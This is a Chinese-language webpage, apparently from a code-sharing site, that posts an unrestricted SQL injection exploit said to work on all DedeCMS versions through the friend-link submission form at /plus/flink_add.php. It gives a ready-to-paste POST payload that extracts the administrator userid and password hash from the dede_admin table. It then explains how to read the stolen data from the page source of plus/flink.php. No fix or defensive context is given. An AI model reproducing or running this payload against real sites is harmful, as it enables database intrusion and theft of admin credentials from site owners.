首页 > 代码库 > DedeCMS另一处全版本通杀SQL注入(无限制)
DedeCMS另一处全版本通杀SQL注入(无限制)
一:网站要支持申请友链
url:/plus/flink_add.php
=——————————————————–利用开始————————–
直接填写验证码,抓包
修改POST数据
写人exp:
1 | Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`‘`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`‘` |
2 | &typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ |
validate为验证码,修改提交即可
再打开友情链接
url:plus/flink.php
有个无法显示的图片,查看源码.ok
DedeCMS另一处全版本通杀SQL注入(无限制)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。